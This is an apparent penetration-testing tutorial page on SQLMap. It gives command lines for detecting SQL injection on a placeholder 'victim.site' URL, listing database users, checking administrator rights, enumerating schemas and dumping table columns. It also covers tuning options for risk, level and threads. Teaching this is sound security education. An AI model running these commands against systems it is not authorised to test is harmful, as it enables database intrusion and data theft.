5.4.6 SQLMap

SQLMap

SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing.

Basic Syntax

Detecting SQL Injection: To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example:
```
$ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=U
```
This command tells SQLMap to test the id parameter of a GET request for view.php using a Union-based SQL injection technique.
Handling POST Parameters: If the injection involves a POST parameter, the syntax would be:
```
$ sqlmap -u <URL> --data=<POST string> -p parameter [options]
```
You can write the POST string manually or copy it from a request intercepted with Burp Proxy.
Using Request Files: Save a request intercepted with Burp Proxy to a file and specify it on the command line:
```
$ sqlmap -r <request file> -p parameter [options]
```

Extracting Information

Database Banner: The --banner switch helps in grabbing the database banner to test injection and include proof of exploitability in reports:
```
$ sqlmap -u <target> --banner <other options>
```
Information Gathering:
- List users of the database:
  $ sqlmap -u <target> --users <other options>
- Check if the web application database user is a database administrator:
  $ sqlmap -u <target> --is-dba <other options>

Database and Schema Extraction:

List all available databases:

$ sqlmap -u <target> --dbs <other options>

Choose a database and list its tables:

$ sqlmap -u <target> -D <database> --tables <other options>

Choose tables and list their columns:

$ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options>

Dump specific columns:

$ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>

SQLMap Advanced Usage

Forcing the DBMS: Specify the DBMS to help shorten the detection phase:
```
$ sqlmap --dbms=<DBMS> ...
```
Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more.
Fine-Tuning Payloads: Use --string and --not-string to handle changes in application output. For example:
```
$ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" <other switches>
```
Utilize --prefix and --suffix for structured POST parameters.
Aggressiveness and Load:
- Use --level to test headers and increase the number of columns tested for in-band exploitation.
- Use --risk to adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections.
Connection Management:
- Use --keep-alive for persistent connections:
  $ sqlmap -u <target> --keep-alive <other commands>
- Use --threads to exploit injections with parallel threads:
  $ sqlmap -u <target> --technique=8 --threads 7 <other commands>

SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration.
Understanding the tools and their options is crucial for successful and responsible penetration testing.
SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process.
Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices.

BurpSuite & SQLMap

A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml).

We will then open that file with SQLMap and check for vulnerabilities or not.

sqlmap -r sql_request_captured.xml

SQLMaphttps://www.kali.org/tools/sqlmap/ https://tryhackme.com/room/sqlmap

Previous5.4.5 Exploiting Blind SQL Injection Next5.4.7 Mitigation Strategies

Last updated 1 year ago